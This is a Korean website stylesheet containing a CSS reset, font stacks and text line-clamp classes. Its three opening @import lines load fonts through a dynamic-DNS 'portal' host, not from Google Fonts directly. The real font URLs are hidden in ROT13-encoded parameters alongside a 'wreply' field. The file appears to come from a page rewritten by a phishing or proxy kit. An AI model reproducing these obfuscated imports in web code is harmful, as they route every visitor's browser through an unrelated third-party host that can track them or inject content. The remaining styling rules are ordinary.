@charset "utf-8";


/* 웹폰트 CSS */
@import url('http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Ssbagf.tbbtyrncvf.pbz%2Srneylnpprff%2Sanahztbguvp.pff');
@import url('http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Ssbagf.tbbtyrncvf.pbz%2Spff%3Ssnzvyl%3QAnahz%2OZlrbatwb%26qvfcynl%3Qfjnc');
@import url('http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Ssbagf.tbbtyrncvf.pbz%2Spff2%3Ssnzvyl%3QAbgb%2OFnaf%2OXE%3Njtug%40100%3O300%3O400%3O500%3O700%3O900%26qvfcynl%3Qfjnc');

/* CSS 초기화 */
html, body, div, span, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, abbr, address, cite, code, del, dfn, em, img, ins, kbd, q, samp, small, strong, sub, sup, var, b, i, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, figcaption, figure, footer, header, hgroup, menu, nav, section, summary, time, mark, audio, video{
margin:0;
padding:0;
border:0;
outline:0;
font-size:100%;
vertical-align:baseline;
/*background:transparent;*/
}

body{
font-family: 'Noto Sans KR', 'Nanum Gothic' , 'Malgun Gothic', dotum, sans-serif;
}

article,aside,details,figcaption,figure, footer,header,hgroup,menu,nav,section{
display:block;
}

nav ul, li{
list-style:none;
}

a{
margin:0;
padding:0;
font-size:100%;
vertical-align:baseline;
background:transparent;
text-decoration:none;
color:#000;
}

a:hover{
	text-decoration:underline;
}

img{
vertical-align:top;
}

hr{
display:block;
height:2px;
border:0;
margin:0;
padding:0;
}

input, textarea{
font-family: 'Noto Sans KR', 'Nanum Gothic' , 'Malgun Gothic', dotum, sans-serif;
/*width:100%;*/
margin:0;
padding:0;
border:0;
/*
border-bottom:1px solid #757575;
color:#3f51b5;
font-family:'Montserrat';
font-size:12px;
vertical-align:top;
border-radius:0;
*/
box-sizing:content-box;
appearance:none;
}

table{ border-collapse: collapse; border-spacing: 0; }

/*
::-moz-input-placeholder, ::-moz-textarea-placeholder{
color:#3f51b5;
}

::-webkit-input-placeholder, ::-webkit-textarea-placeholder{
color:#3f51b5;
}
*/

/*텍스트 라인 설정 - 1줄~5줄 이상 안보이게 설정*/
.txt_line1{white-space: nowrap; overflow: hidden; text-overflow: ellipsis;word-wrap: break-word;}
.txt_line2{text-overflow: ellipsis;display: -webkit-box !important;-webkit-line-clamp: 2;-webkit-box-orient: vertical;word-wrap: break-word;overflow: hidden;}
.txt_line3{text-overflow: ellipsis;display: -webkit-box !important;-webkit-line-clamp: 3;-webkit-box-orient: vertical;word-wrap: break-word;overflow: hidden;}
.txt_line4{text-overflow: ellipsis;display: -webkit-box !important;-webkit-line-clamp: 4;-webkit-box-orient: vertical;word-wrap: break-word;overflow: hidden;}
.txt_line5{text-overflow: ellipsis;display: -webkit-box !important;-webkit-line-clamp: 5;-webkit-box-orient: vertical;word-wrap: break-word;overflow: hidden;}